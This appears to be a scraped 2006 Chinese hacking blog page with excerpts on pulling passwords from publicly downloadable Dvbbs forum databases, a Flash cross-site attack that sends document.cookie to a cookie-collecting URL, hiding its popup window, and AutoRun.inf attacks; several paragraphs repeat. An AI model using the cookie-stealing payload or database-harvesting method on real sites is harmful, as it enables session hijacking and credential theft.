不错呦!smile@林凯西,确保“准备文件”中的几个文件都有安装,S...您好,看了您这篇帖子觉得很有帮助。但是有个问题想请...我的修改过了怎么还被恶意注册呢 @jjjjiiii 用PJ快9年了,主要是A...PJ3啊,貌似很少有人用PJ了,现在不是WP就是z...@332347365,我当时接入时错误码没有-10...楼主,ChkValue值应为-103是什么意思呢?...大哥 你最近能看到我发的信息,请跟我联系,我有个制...
对动网的一个误解
编辑:dnawo 日期:2006-12-01
曾经尝试过暴力破解MD5密文,在不明所以的情况下,暴力破解成功率微乎其微,虽有传闻山东大学的王小云教授破译MD5加密法,但终究也未见什么先进的破解软件或算法出来,因而对MD5是非常信任的,一直也都认为只要密码设置复杂一些,数据库文件名以及路径改不改不是非常重要。注意密码一定要复杂一些,如果为纯数字10位以下的密码,有些破解软件几秒内就能破解出来的!
今天看了一篇文章说有些管理员没有及时的清空日志的习惯,而这些日志都保存在数据库中,才觉得事情没有想像中的简单,打开Google搜索data/dvbbs7.mdb,下载了一论坛数据库,打开Dv_log表,复制其l_content字段中的所有内容粘贴到记事本,搜索password,下边是我提取出来的关键信息:
今天看了一篇文章说有些管理员没有及时的清空日志的习惯,而这些日志都保存在数据库中,才觉得事情没有想像中的简单,打开Google搜索data/dvbbs7.mdb,下载了一论坛数据库,打开Dv_log表,复制其l_content字段中的所有内容粘贴到记事本,搜索password,下边是我提取出来的关键信息:
关于IE执行任意程序漏洞的深入分析
编辑:admin 日期:2006-10-08
新人零起步接触黑客之网站入侵知识
编辑:admin 日期:2006-08-31
用VBS可执行程序+Xmlhttp下载网络文件
编辑:admin 日期:2006-07-27
反编译工具jad简单用法
编辑:admin 日期:2006-07-14
用三种方法破解“ICO精灵V2.0”
编辑:admin 日期:2006-07-06
打造一个完美的IE网页木马
编辑:admin 日期:2006-06-28
防止Flash跨站攻击弹出IE窗口
编辑:admin 日期:2006-06-28
前些天一直忙着学习WIN32汇编,一直懒得写文章,这些天来好像Flash跨站攻击闹的挺凶的,但在实施Flash跨站攻击时的那个弹出的IE窗口很容易引起别人的怀疑,而使得Flash跨站攻击失败,这的确让人多少有点头疼,大家是不是也一直在寻找实施Flash跨站攻击时不弹出IE窗口的方法来隐藏自己的攻击行为呢?下面大家和我一起来解决这个不大不小的问题,让Flash跨站攻击更完美吧!
一般来说大家在进行Flash跨站攻击时都是自己做一个Flash动画,并在第一帧中加入用于跳转到其他URL的AtionScript脚本函数,如下:
getURL("BLOCKED SCRIPTwindow.open(’http://用于收集Cookie的网页地址?’+document cookie)","_self") 然后把这个Flash动画置于论坛中的签名、贴子或短信消息中,用来获得管理员或用户的Cookie,从而得到管理权限,进一步伺机控制整个站点,最终达到自己的目的。我们可以看到在整个跨站攻击中最重要的就是这个AtionScript脚本啦!也就是这个脚本中用到的代码打开了一个我们又爱又恨的窗口,所以我们也只能从改造这个脚本代码来实现隐藏或者是去掉弹出的IE窗口,除此外别无它法!
我们先分析一下上面的AtionScript脚本,它使用AtionScript脚本函数"getURL"跳转到一个使用JavaScript协议的URL(JavaScript协议后面就是我们非常熟悉的JavaScript脚本代码),在JavaScript中使用document.cookie的到Cookie,并把Cookie和一个用于收集Cookie的网页地址连成一个http协议的URL地址,最后使用window.open打开合成的URL地址,从而把Cookie用GET方式发送到用于收集Cookie的网页,并记录下来。
通过上面的分析我们进一步了解那个弹出的IE窗口是由于JavaScript协议中的代码window.open所生成的,相信大家都知道window.open的第二个参数用来指定打开的窗口的名字,其通用名称有"_media (IE6.0 在浏览器左边的媒体面板内打开)"、"_blank (在新窗口中打开)"、"_parent (在当前框架的父框架内打开。假如当前框架无父框架,此参数值等同于 _self)"、"_search (IE5.0 在浏览器左边的搜索面板内打开)"、"_self(在当前窗口中打开,覆盖当前文档)"、"_top (在所有框架之外的最顶层窗口中打开 。假如当前窗口无框架结构,此参数值等同于 _self )"等几种,如果我们以"_search"来打开窗口,不是就没有了弹出的IE窗口了吗?AtionScript脚本改为:
一般来说大家在进行Flash跨站攻击时都是自己做一个Flash动画,并在第一帧中加入用于跳转到其他URL的AtionScript脚本函数,如下:
getURL("BLOCKED SCRIPTwindow.open(’http://用于收集Cookie的网页地址?’+document cookie)","_self") 然后把这个Flash动画置于论坛中的签名、贴子或短信消息中,用来获得管理员或用户的Cookie,从而得到管理权限,进一步伺机控制整个站点,最终达到自己的目的。我们可以看到在整个跨站攻击中最重要的就是这个AtionScript脚本啦!也就是这个脚本中用到的代码打开了一个我们又爱又恨的窗口,所以我们也只能从改造这个脚本代码来实现隐藏或者是去掉弹出的IE窗口,除此外别无它法!
我们先分析一下上面的AtionScript脚本,它使用AtionScript脚本函数"getURL"跳转到一个使用JavaScript协议的URL(JavaScript协议后面就是我们非常熟悉的JavaScript脚本代码),在JavaScript中使用document.cookie的到Cookie,并把Cookie和一个用于收集Cookie的网页地址连成一个http协议的URL地址,最后使用window.open打开合成的URL地址,从而把Cookie用GET方式发送到用于收集Cookie的网页,并记录下来。
通过上面的分析我们进一步了解那个弹出的IE窗口是由于JavaScript协议中的代码window.open所生成的,相信大家都知道window.open的第二个参数用来指定打开的窗口的名字,其通用名称有"_media (IE6.0 在浏览器左边的媒体面板内打开)"、"_blank (在新窗口中打开)"、"_parent (在当前框架的父框架内打开。假如当前框架无父框架,此参数值等同于 _self)"、"_search (IE5.0 在浏览器左边的搜索面板内打开)"、"_self(在当前窗口中打开,覆盖当前文档)"、"_top (在所有框架之外的最顶层窗口中打开 。假如当前窗口无框架结构,此参数值等同于 _self )"等几种,如果我们以"_search"来打开窗口,不是就没有了弹出的IE窗口了吗?AtionScript脚本改为:
解析来自Autorun.inf文件的攻击
编辑:admin 日期:2006-06-28
最近网上流行通过AutoRun.inf文件使对方所有的硬盘完全共享或中木马的方法,由于AutoRun.inf文件在黑客技术中的应用还是很少见的,相应的资料也不多,有很多人对此觉得很神秘,本文试图为您解开这个迷,使您能完全的了解这个并不复杂却极其有趣的技术。
一、理论基础
经常使用光盘的朋友都知道,有很多光盘放入光驱就会自动运行,它们是怎么做的呢?光盘一放入光驱就会自动被执行,主要依靠两个文件,一是光盘上的AutoRun.inf文件,另一个是操作系统本身的系统文件之一的Cdvsd.vxd。Cdvsd.vxd会随时侦测光驱中是否有放入光盘的动作,如果有的话,便开始寻找光盘根目录下的AutoRun.inf文件。如果存在AutoRun.inf文件则执行它里面的预设程序。
一、理论基础
经常使用光盘的朋友都知道,有很多光盘放入光驱就会自动运行,它们是怎么做的呢?光盘一放入光驱就会自动被执行,主要依靠两个文件,一是光盘上的AutoRun.inf文件,另一个是操作系统本身的系统文件之一的Cdvsd.vxd。Cdvsd.vxd会随时侦测光驱中是否有放入光盘的动作,如果有的话,便开始寻找光盘根目录下的AutoRun.inf文件。如果存在AutoRun.inf文件则执行它里面的预设程序。
搜索1diu.com站点Flash地址
编辑:admin 日期:2006-06-28
网站地址:http://www.1diu.com/
说明:该站Flash地址相关的文件共有三个,/include/top.js、/npic/ctrl.js和显示Flash页面(称为index.htm)。
相关代码:
说明:该站Flash地址相关的文件共有三个,/include/top.js、/npic/ctrl.js和显示Flash页面(称为index.htm)。
相关代码: